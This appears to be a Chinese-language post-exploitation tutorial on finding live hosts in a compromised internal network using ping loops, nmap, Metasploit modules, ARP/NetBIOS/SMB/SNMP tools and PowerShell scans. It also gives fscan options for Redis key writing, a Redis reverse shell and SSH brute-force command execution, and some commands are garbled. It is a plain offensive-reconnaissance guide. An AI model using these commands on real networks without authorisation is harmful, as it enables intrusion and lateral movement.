前言

在拿下通內(nèi)網(wǎng)的主機權(quán)限后，普遍需要更進一步的收集內(nèi)網(wǎng)信息，此時如何有效快速的探測內(nèi)網(wǎng)存活主機關(guān)系到我們下一步的進展情況。當然自從有了Fscan后，我們的效率已經(jīng)大大提高，不過在某些情況下fscan有時會無法正常探測，此時如何使用其他方法有效地收集內(nèi)網(wǎng)信息成了關(guān)鍵，這篇文章主要記錄一下在不同環(huán)境、不同條件下探測內(nèi)網(wǎng)存活主機的方法。

內(nèi)網(wǎng)主機探測的不同場景

我們主機掃描的場景主要分為三種：

1、獲取到了webshell，此時一般用系統(tǒng)命令或上傳腳本工具進行探測；

2、主機已在目標內(nèi)網(wǎng)，比如已經(jīng)通過正向或者反向代理搭建隧道的場景。此時可以考慮proxychains+Nmap掃描；

3、拿到了一個反彈的webshell，則可以考慮MSF。要根據(jù)不同的場景考慮支持存活探測的協(xié)議，包括了ARP、ICMP、SMB、 UDP、SNMP協(xié)議等；支持端口掃描的方式，包括TCP掃描、UDP掃描、ICMP掃描等。

內(nèi)網(wǎng)不同協(xié)議主機探測的方式

ICMP協(xié)議探測

它是TCP/IP協(xié)議簇的一個子協(xié)議，用于在IP主機、路由器之間傳遞控制消息?？刂葡⑹侵?a href="http://m.1cnz.cn/v/tag/1722/" target="_blank">網(wǎng)絡(luò)通不通、主機是否可達、路由是否可用等網(wǎng)絡(luò)本身的消息。這些控制消息雖然并不傳輸用戶數(shù)據(jù)，但是對于用戶數(shù)據(jù)的傳遞起著重要的作用。

ping

ping是我們一個常用工具，主要用來測試網(wǎng)絡(luò)連通性。也可以用它來完成對C段的探測，雖然效率低時間慢，但是不易出發(fā)安全規(guī)則。（服務(wù)器開啟防火墻或者禁ping的時候不可用，否則影響探測結(jié)果）

?Windows

 for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1|find /i "ttl="

這是我在CS里執(zhí)行的ping命令，可以看到c段內(nèi)有兩臺主機存活 也可以寫進文件里，方便后續(xù)查看。寫進C盤的話需要administer權(quán)限，可以考慮更換盤符

@for/l%iin(1,1,255)do@ping-n1-w40192.168.1.%i&iferrorlevel1(echo192.168.1.%i>>./a.txt)else(echo192.168.1.%i>>./111.txt)

Linux

for k in $( seq 1 255);do ping -c 1 10.211.55.|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

另外，還可以結(jié)合系統(tǒng)自帶的traceroute、arp 、netstat等命令收集內(nèi)網(wǎng)信息，curl、wget可以用來做端口探測

nmap

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
#或者
nmap ‐sn ‐PE ‐T4 192.168.1.0/24

UDP協(xié)議探測

Internet 協(xié)議集支持一個無連接的傳輸協(xié)議，該協(xié)議稱為用戶數(shù)據(jù)報協(xié)議（UDP，User Datagram Protocol）。UDP 為應(yīng)用程序提供了一種無需建立連接就可以發(fā)送封裝的 IP 數(shù)據(jù)包的方法。

Msf

msf > use auxiliary/scanner/discovery/udp_probe
或者
msf > use auxiliary/scanner/discovery/udp_sweep

nmap

sudo nmap -sU -T5 -sV --max-retries 1 10.211.55.5 -p 500

unicornscan（Linux下使用）

unicornscan-mU10.255.55.5

ScanLine（Windows下使用）

sl.exe -h -u 53,161,137,139 -O C:UsersAdministratorDes
ktoplog.txt -p 192.168.1.1-254

Netbios協(xié)議

NetBIOS協(xié)議是由IBM公司開發(fā)，主要用于數(shù)十臺計算機的小型局域網(wǎng)。NetBIOS協(xié)議是一種在局域網(wǎng)上的程序可以使用的應(yīng)用程序編程接口（API），為程序提供了請求低級服務(wù)的統(tǒng)一的命令集，作用是為了給局域網(wǎng)提供網(wǎng)絡(luò)以及其他特殊功能，幾乎所有的局域網(wǎng)都是在NetBIOS協(xié)議的基礎(chǔ)上工作的。

nmap

sudo nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4

MSF

use auxiliary/scanner/netbios/nbname

nbtscan掃描

互聯(lián)網(wǎng)搜索引擎nbtscan是一個掃描WINDOWS網(wǎng)絡(luò)NetBIOS信息的小工具，2005年11月23日發(fā)布。NBTSCAN身材嬌小，簡單快速。但只能用于局域網(wǎng)，可以顯示IP，主機名，用戶名稱和MAC地址等等。

下載地址：
http://www.unixwiz.net/tools/nbtscan.html#download
以Windows用法為例：nbtscan-1.0.35.exe -m 10.211.55.0/24

ARP協(xié)議

這是根據(jù)IP地址獲取物理地址的一個TCP/IP協(xié)議。主機發(fā)送信息時將包含目標IP地址的ARP請求廣播到局域網(wǎng)絡(luò)上的所有主機，并接收返回消息，以此確定目標的物理地址；收到返回消息后將該IP地址和物理地址存入本機ARP緩存中并保留一定時間，下次請求時直接查詢ARP緩存以節(jié)約資源。

nmap

nmap -sn -PR 10.211.55.1/24

MSF

use auxiliary/scanner/discovery/arp_sweep

netdiscover

Netdiscover是一種網(wǎng)絡(luò)掃描工具，通過ARP掃描發(fā)現(xiàn)活動主機，可以通過主動和被動兩種模式進行ARP掃描。通過主動發(fā)送ARP請求檢查網(wǎng)絡(luò)ARP流量，通過自動掃描模式掃描網(wǎng)絡(luò)地址。

sudo netdiscover -r 10.211.55.0/24 -i eth0

arp-scan

可以看到這工具掃描速度挺快的

sudo arp-scan --interface=eth0 --localnet

SMB協(xié)議

SMB（Server Message Block）通信協(xié)議是微軟和英特爾在1987年制定的協(xié)議，主要是作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。SMB 是在會話層（session layer）和表示層（presentation layer）以及小部分應(yīng)用層（application layer）的協(xié)議。

Msf

use auxiliary/scanner/smb/smb_version

nmap

nmap -sU -sS --script smb-enum-shares.nse  -p 445 10.211.55.3

通過cmd

for /l %a in (1,1,254) do start /min /low telnet 10.211.55.%a 445

crackmapexec

CrackMapExec（CME）是一款后滲透利用工具，可幫助自動化大型活動目錄(AD)網(wǎng)絡(luò)安全評估任務(wù)。其締造者@byt3bl33d3r稱，該工具的生存概念是，“利用AD內(nèi)置功能/協(xié)議達成其功能，并規(guī)避大多數(shù)終端防護/IDS/IPS解決方案?！?/p>

cme smb 10.211.55.0/24

SNMP協(xié)議

SNMP 是專門設(shè)計用于在 IP 網(wǎng)絡(luò)管理網(wǎng)絡(luò)節(jié)點（服務(wù)器、工作站、路由器、交換機及HUBS等）的一種標準協(xié)議，它是一種應(yīng)用層協(xié)議。SNMP 使網(wǎng)絡(luò)管理員能夠管理網(wǎng)絡(luò)效能，發(fā)現(xiàn)并解決網(wǎng)絡(luò)問題以及規(guī)劃網(wǎng)絡(luò)增長。通過 SNMP 接收隨機消息（及事件報告）網(wǎng)絡(luò)管理系統(tǒng)獲知網(wǎng)絡(luò)出現(xiàn)問題。

nmap

sudo nmap -sU --script snmp-brute 10.211.55.0/24 -T4

Msf

use auxiliary/scanner/snmp/snmp_enum

snmp for pl

這些 perl 腳本用于從目標系統(tǒng)中提取 SNMP 數(shù)據(jù)并解析這些文件以獲取潛在的可用數(shù)據(jù)。

項目地址：https://github.com/dheiland-r7/snmp

這個工具在使用前需要編譯，這里參考網(wǎng)上大佬的教程

wget http://www.cpan.org/modules/by-module/NetAddr/NetAddr-IP-4.078.tar.gz
tar xvzf ./NetAddr-IP-4.078.tar.gz
cd NetAddr-IP-4.078/
perl Makefile.PL
make
make install

使用方法：./snmpbw.pl 192.168.0.1 public 2 1
 ./snmpbw.pl ipfile.txt  public 2 4

常見的一些其它工具

Fscan

這個就不多介紹了，太常見

fscan -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/24  (默認使用全部模塊)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫私鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)

通過powershell腳本掃描IP地址存活

這里列舉幾個項目地址：

https://github.com/nettitude/PoshC2_Old/blob/master/Modules/Invoke-Arpscan.ps1
https://github.com/dwj7738/My-Powershell-Repository/blob/master/Scripts/Invoke-TSPingSweep.ps1

使用方法：

powershell.exe -exec bypass -Command "Import-Module .arpscan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.1.0 -EndAddress 192.168.1.255"

此外，還可以用powershell實現(xiàn)基本的端口掃描功能

針對單個IP的多個端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

針對單個IP的多個端口的掃描

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.3",$_)) "Port $_ is open!"} 2>$null

針對某IP段 & 多個端口的掃描

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.211.55.$a",$_)) "Port $_ is open!"} 2>$null}

PTscan

PTscan(Phantom scanner) 是一款界面友好的輕量級web應(yīng)用資產(chǎn)掃描器，適合于內(nèi)網(wǎng)滲透測試環(huán)境下web的資產(chǎn)快捷識別，只需Python環(huán)境，無需第三方擴展庫，掃描結(jié)果使用zoomeye網(wǎng)頁樣式。
PTscan參考了F-NAScan的設(shè)計思路，在其基礎(chǔ)上修改而成，把程序重心放在WEB掃描和識別功能上。
使用方法：

Usage: python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306]  [-m 50] [-t 10] [-n] [-b] [-r]
##
-f  指定掃描目標文件，文件格式如list.txt所示，同時支持IP和URL
-h  指定掃描IP或IP段，支持段掃描，如192.168.1 即為掃描C段，192.168 即為掃描B段
-p  指定掃描端口，缺省使用程序中的配置端口
-m  指定線程數(shù)
-t  指定timeout
-n  不進行ping操作，直接掃描
-b  開啟Banner識別

-r ReverseIP